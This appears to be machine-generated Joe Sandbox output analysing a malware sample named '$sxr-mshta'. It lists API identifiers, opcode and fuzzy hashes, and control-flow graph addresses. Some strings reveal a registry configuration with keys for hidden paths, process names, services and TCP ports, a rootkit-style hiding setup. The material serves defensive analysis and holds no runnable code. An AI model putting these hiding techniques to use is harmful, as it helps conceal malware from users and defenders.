                                                                                                                      • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2995914023-0
                                                                                                                      • Opcode ID: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
                                                                                                                      • Instruction ID: ea86fe5f0ed52ae5cc64cab38e145c3400b4e51de6f73acc22bffbbc4feaa70b
                                                                                                                      • Opcode Fuzzy Hash: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
                                                                                                                      • Instruction Fuzzy Hash: 42510D31908E4685F760AF23E8D0775A2E4FB477A4FE80435D94E86695DF3EE9C88720
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3328510275-0
                                                                                                                      • Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                                      • Instruction ID: 3ad0317acba294e503705554d0d3cff192d72a95ef70eaf17eaae038c2faa7ab
                                                                                                                      • Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                                      • Instruction Fuzzy Hash: 5A219531B15F90C1E6219F12A500799F6A5F78FBD0F495236EE896BBD8EF38C4518701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 126 1a00aad29a0-1a00aad2a0b call 1a00aad0f34 * 4 135 1a00aad2a11-1a00aad2a14 126->135 136 1a00aad2c23 126->136 135->136 138 1a00aad2a1a-1a00aad2a1d 135->138 137 1a00aad2c25-1a00aad2c41 136->137 138->136 139 1a00aad2a23-1a00aad2a26 138->139 139->136 140 1a00aad2a2c-1a00aad2a4a VirtualAlloc 139->140 140->136 141 1a00aad2a50-1a00aad2a74 call 1a00aad0d6c 140->141 144 1a00aad2a76-1a00aad2aa1 call 1a00aad0d6c 141->144 145 1a00aad2aa3-1a00aad2aaa 141->145 144->145 147 1a00aad2b4a-1a00aad2b51 145->147 148 1a00aad2ab0-1a00aad2abd 145->148 150 1a00aad2c04-1a00aad2c21 147->150 151 1a00aad2b57-1a00aad2b6e 147->151 148->147 152 1a00aad2ac3-1a00aad2ad1 148->152 150->137 151->150 153 1a00aad2b74 151->153 159 1a00aad2b35-1a00aad2b3d 152->159 160 1a00aad2ad3-1a00aad2add 152->160 155 1a00aad2b7a-1a00aad2b8f 153->155 157 1a00aad2b91-1a00aad2ba2 155->157 158 1a00aad2bf3-1a00aad2bfe 155->158 163 1a00aad2bad-1a00aad2bb1 157->163 164 1a00aad2ba4-1a00aad2bab 157->164 158->150 158->155 159->152 161 1a00aad2b3f-1a00aad2b44 159->161 165 1a00aad2ae0-1a00aad2ae4 160->165 161->147 167 1a00aad2bbc-1a00aad2bc0 163->167 168 1a00aad2bb3-1a00aad2bba 163->168 166 1a00aad2be0-1a00aad2bf1 164->166 169 1a00aad2ae6-1a00aad2aea 165->169 170 1a00aad2b32 165->170 166->157 166->158 171 1a00aad2bd2-1a00aad2bd6 167->171 172 1a00aad2bc2-1a00aad2bd0 167->172 168->166 173 1a00aad2aec-1a00aad2b13 169->173 174 1a00aad2b15-1a00aad2b1f 169->174 170->159 171->166 176 1a00aad2bd8-1a00aad2bdb 171->176 172->166 175 1a00aad2b25-1a00aad2b30 173->175 174->175 175->165 176->166
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction ID: c9cf6f5040c86bcf3847dedca6d4ac5f91d63bb0bd5d9c9f60c5a2eba71b3a6f
                                                                                                                      • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction Fuzzy Hash: 8D61233270225083EB6ACF15D6507EDB391FB4ABD4F548221EA9A07BC5DB38E896C701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4292702814-0
                                                                                                                      • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction ID: e0b30aa0e67bf74424123e57286eb7d4fbf55c1ab2cd6a37b5abb5d6e6d20d36
                                                                                                                      • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction Fuzzy Hash: C7F06D74703E05C9FF5B5F629651BD9D2809B4FBC0F0A5823A90A9E3D1FF2CC4418212
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 194 1a00bdbb978-1a00bdbb97b 195 1a00bdbb97d-1a00bdbb996 HeapFree 194->195 196 1a00bdbb9b4 194->196 197 1a00bdbb998 call 1a00bdbb8e0 195->197 198 1a00bdbb9af-1a00bdbb9b3 195->198 197->198 198->196
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction ID: b1310946baaa146bd96c7807db8a835eb8cf8186b8e31cd4033629dda616d4af
                                                                                                                      • Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction Fuzzy Hash: F5D0A9B0B03C02C6FE2E9FA26A057F08240DB9F7C4F048023B80889291FB1084918242
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 200 1a00a5b0fc1 201 1a00a5b0fc3-1a00a5b0fd4 200->201
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2915898669.000001A00A5B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001A00A5B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00a5b0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                      • Instruction ID: 24b1b97687fa8c33246133a52294ce69bdb011dba7b5e7b4cbb69c904c6eacf0
                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                      • Instruction Fuzzy Hash: 79900254AA640A55D41551910D4639D5040738D392FD446805416D0184D54D42D75163
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 308 1a00bdb2d78-1a00bdb2df1 call 1a00bdcecc0 311 1a00bdb312c-1a00bdb314f 308->311 312 1a00bdb2df7-1a00bdb2dfd 308->312 312->311 313 1a00bdb2e03-1a00bdb2e06 312->313 313->311 314 1a00bdb2e0c-1a00bdb2e0f 313->314 314->311 315 1a00bdb2e15-1a00bdb2e25 GetModuleHandleA 314->315 316 1a00bdb2e39 315->316 317 1a00bdb2e27-1a00bdb2e37 GetProcAddress 315->317 318 1a00bdb2e3c-1a00bdb2e5a 316->318 317->318 318->311 320 1a00bdb2e60-1a00bdb2e7f StrCmpNIW 318->320 320->311 321 1a00bdb2e85-1a00bdb2e89 320->321 321->311 322 1a00bdb2e8f-1a00bdb2e99 321->322 322->311 323 1a00bdb2e9f-1a00bdb2ea6 322->323 323->311 324 1a00bdb2eac-1a00bdb2ebf 323->324 325 1a00bdb2ecf 324->325 326 1a00bdb2ec1-1a00bdb2ecd 324->326 327 1a00bdb2ed2-1a00bdb2ed6 325->327 326->327 328 1a00bdb2ed8-1a00bdb2ee4 327->328 329 1a00bdb2ee6 327->329 330 1a00bdb2ee9-1a00bdb2ef3 328->330 329->330 331 1a00bdb2fe9-1a00bdb2fed 330->331 332 1a00bdb2ef9-1a00bdb2efc 330->332 333 1a00bdb311e-1a00bdb3126 331->333 334 1a00bdb2ff3-1a00bdb2ff6 331->334 335 1a00bdb2f0e-1a00bdb2f18 332->335 336 1a00bdb2efe-1a00bdb2f0b call 1a00bdb1a14 332->336 333->311 333->324 340 1a00bdb2ff8-1a00bdb3004 call 1a00bdb1a14 334->340 341 1a00bdb3007-1a00bdb3011 334->341 338 1a00bdb2f1a-1a00bdb2f27 335->338 339 1a00bdb2f4c-1a00bdb2f56 335->339 336->335 338->339 343 1a00bdb2f29-1a00bdb2f36 338->343 344 1a00bdb2f58-1a00bdb2f65 339->344 345 1a00bdb2f86-1a00bdb2f89 339->345 340->341 347 1a00bdb3013-1a00bdb3020 341->347 348 1a00bdb3041-1a00bdb3044 341->348 352 1a00bdb2f39-1a00bdb2f3f 343->352 344->345 353 1a00bdb2f67-1a00bdb2f74 344->353 354 1a00bdb2f8b-1a00bdb2f95 call 1a00bdb1d28 345->354 355 1a00bdb2f97-1a00bdb2fa4 lstrlenW 345->355 347->348 349 1a00bdb3022-1a00bdb302f 347->349 350 1a00bdb3051-1a00bdb305e lstrlenW 348->350 351 1a00bdb3046-1a00bdb304f call 1a00bdb1d28 348->351 357 1a00bdb3032-1a00bdb3038 349->357 363 1a00bdb3081-1a00bdb308b call 1a00bdb39d0 350->363 364 1a00bdb3060-1a00bdb306a 350->364 351->350 368 1a00bdb3096-1a00bdb30a1 351->368 361 1a00bdb2fdf-1a00bdb2fe4 352->361 362 1a00bdb2f45-1a00bdb2f4a 352->362 365 1a00bdb2f77-1a00bdb2f7d 353->365 354->355 354->361 358 1a00bdb2fc7-1a00bdb2fd9 call 1a00bdb39d0 355->358 359 1a00bdb2fa6-1a00bdb2fb0 355->359 367 1a00bdb303a-1a00bdb303f 357->367 357->368 358->361 372 1a00bdb308e-1a00bdb3090 358->372 359->358 369 1a00bdb2fb2-1a00bdb2fc5 call 1a00bdb1554 359->369 361->372 362->339 362->352 363->372 364->363 373 1a00bdb306c-1a00bdb307f call 1a00bdb1554 364->373 365->361 374 1a00bdb2f7f-1a00bdb2f84 365->374 367->348 367->357 377 1a00bdb3118-1a00bdb311c 368->377 378 1a00bdb30a3-1a00bdb30a7 368->378 369->358 369->361 372->333 372->368 373->363 373->368 374->345 374->365 377->333 383 1a00bdb30a9-1a00bdb30ad 378->383 384 1a00bdb30af-1a00bdb30c9 call 1a00bdb8740 378->384 383->384 387 1a00bdb30cc-1a00bdb30cf 383->387 384->387 390 1a00bdb30f2-1a00bdb30f5 387->390 391 1a00bdb30d1-1a00bdb30ef call 1a00bdb8740 387->391 390->377 393 1a00bdb30f7-1a00bdb3115 call 1a00bdb8740 390->393 391->390 393->377
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                                      • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction ID: eea6f709ce83b93bf8c931aa4dc70c80e406a7dbfba1389e0918635ceccdc5f6
                                                                                                                      • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction Fuzzy Hash: C4B17C72312E91C2EB568F26D640BE9A7A4FB4BBD4F455017FE095BB94EB35C880C341
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3140674995-0
                                                                                                                      • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction ID: 3ba8e6e439e03b5a3bc758d3b8f8069b87eaa1d419f2ede4741ca8f294e68c32
                                                                                                                      • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction Fuzzy Hash: F5317072306F81CAEB618F60E8407DDB764F78A794F44842AEA4E4BB95EF38C548C715
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction ID: c5477e2f072d014b5c46831cd8435b1e3c063a6f184e80f6aae3f12c941a2b3f
                                                                                                                      • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction Fuzzy Hash: 19317C32315F8096DB618F25E8407DEB7A4F78A7A4F504127EA8D4BB98EF38C545CB01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1443284424-0
                                                                                                                      • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction ID: f5841654a05ab3f79805421bf165e4961e83cb85bd3758965bcddfde686f1e8d
                                                                                                                      • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction Fuzzy Hash: 6BE1CE72715A81DAE702CF64D6403DEBBB1F34B7C8F148116EE4A5BB99EA34C516C701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                                      • API String ID: 3215553584-1407779936
                                                                                                                      • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                                      • Instruction ID: 3d9d3ed3b6d7a55fb82e6fc493a3f6bc75b91b6af9b0b08d1d0f39a31465a3d5
                                                                                                                      • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                                      • Instruction Fuzzy Hash: CB51CD73712A9485EF16CBA29A007DD27A1FB5BBD8F454625FE9A07FC5EB38C0818311
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1249254920-0
                                                                                                                      • Opcode ID: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
                                                                                                                      • Instruction ID: f192d7fb05820ef89a59105d662f75026b9b7294489770cd224426d06a5e2049
                                                                                                                      • Opcode Fuzzy Hash: 9cf6c44da13e02a05fc4d3dcc4ca3e30ed2f46184eaf7001aa2c8df375b04596
                                                                                                                      • Instruction Fuzzy Hash: 5ED09E55A08D0686F7182FA36C9507662909B5BB61BC51034CB0A473129E3F54C94638
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
                                                                                                                      • Instruction ID: fbf6090339103f8706c32787f5a024e0f6485dd4b4e1b0993b2fb41089bd29a6
                                                                                                                      • Opcode Fuzzy Hash: e98009fc70158ea5415607d79adf01d037d59db10dc6a2a59361e2c62c52725f
                                                                                                                      • Instruction Fuzzy Hash: 0F51F332711A90C8FB218F76AA00BDEBBA5F34BBD4F154216FE584BA85EB38C101C701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
                                                                                                                      • Instruction ID: d41e5e2ec7e375afcd4b734f3e400c7634ff8376c6f8c4fcde5e4f7add289710
                                                                                                                      • Opcode Fuzzy Hash: d18d6d85a8f617bb5500e753f487753302b7fe5cd23ded35b267988b4d6b386f
                                                                                                                      • Instruction Fuzzy Hash: 09B09214E25C02D1E604BF629CC10A152E0AB5B720FD10470C10D81120DF1EA5DE8B20
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                                      • Instruction ID: 76718d07cd2c7828e1effbd055bf188703fdcca96aec33297c295a49f92cd050
                                                                                                                      • Opcode Fuzzy Hash: 02a0dc21c4cc38a4ec26d0a9d58c393b00474c81d7d375ca2079895bfbc551e1
                                                                                                                      • Instruction Fuzzy Hash: 34F062727552949AEBE5CF28A94275977E0F34D3C0F808619E689C3F48D33C80A09F09
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 203 1a00bdb1650-1a00bdb16e2 GetProcessHeap call 1a00bdc3180 call 1a00bdb1274 call 1a00bdb1000 call 1a00bdb1274 * 3 call 1a00bdb1000 * 3 RegOpenKeyExW 222 1a00bdb16e8-1a00bdb170f RegOpenKeyExW 203->222 223 1a00bdb18ce-1a00bdb18d8 203->223 224 1a00bdb1711-1a00bdb1715 222->224 225 1a00bdb1727-1a00bdb1749 RegOpenKeyExW 222->225 226 1a00bdb1718 call 1a00bdb12c8 224->226 227 1a00bdb174b-1a00bdb174f 225->227 228 1a00bdb1762-1a00bdb1784 RegOpenKeyExW 225->228 229 1a00bdb171d-1a00bdb1721 RegCloseKey 226->229 230 1a00bdb1753 call 1a00bdb104c 227->230 231 1a00bdb179d-1a00bdb17bf RegOpenKeyExW 228->231 232 1a00bdb1786-1a00bdb178a 228->232 229->225 233 1a00bdb1758-1a00bdb175c RegCloseKey 230->233 235 1a00bdb17d8-1a00bdb17fa RegOpenKeyExW 231->235 236 1a00bdb17c1-1a00bdb17c5 231->236 234 1a00bdb178e call 1a00bdb12c8 232->234 233->228 240 1a00bdb1793-1a00bdb1797 RegCloseKey 234->240 238 1a00bdb17fc-1a00bdb1800 235->238 239 1a00bdb1813-1a00bdb1835 RegOpenKeyExW 235->239 237 1a00bdb17c9 call 1a00bdb12c8 236->237 241 1a00bdb17ce-1a00bdb17d2 RegCloseKey 237->241 242 1a00bdb1804 call 1a00bdb12c8 238->242 243 1a00bdb184e-1a00bdb1870 RegOpenKeyExW 239->243 244 1a00bdb1837-1a00bdb183b 239->244 240->231 241->235 245 1a00bdb1809-1a00bdb180d RegCloseKey 242->245 247 1a00bdb1889-1a00bdb18ab RegOpenKeyExW 243->247 248 1a00bdb1872-1a00bdb1876 243->248 246 1a00bdb183f call 1a00bdb104c 244->246 245->239 249 1a00bdb1844-1a00bdb1848 RegCloseKey 246->249 251 1a00bdb18ad-1a00bdb18b1 247->251 252 1a00bdb18c4-1a00bdb18c8 RegCloseKey 247->252 250 1a00bdb187a call 1a00bdb104c 248->250 249->243 254 1a00bdb187f-1a00bdb1883 RegCloseKey 250->254 253 1a00bdb18b5 call 1a00bdb104c 251->253 252->223 255 1a00bdb18ba-1a00bdb18be RegCloseKey 253->255 254->247 255->252
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                      • API String ID: 106492572-3028563969
                                                                                                                      • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction ID: 7b9f30cc8e8fe4a9c8962c2d417534b141b9a934be96b0e57cce50772ab1ea9a
                                                                                                                      • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction Fuzzy Hash: F4713936322E11D6EB119F21E951BD9B7A4FB8FBD8F015122EA4D5BA28EF38C444C305
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
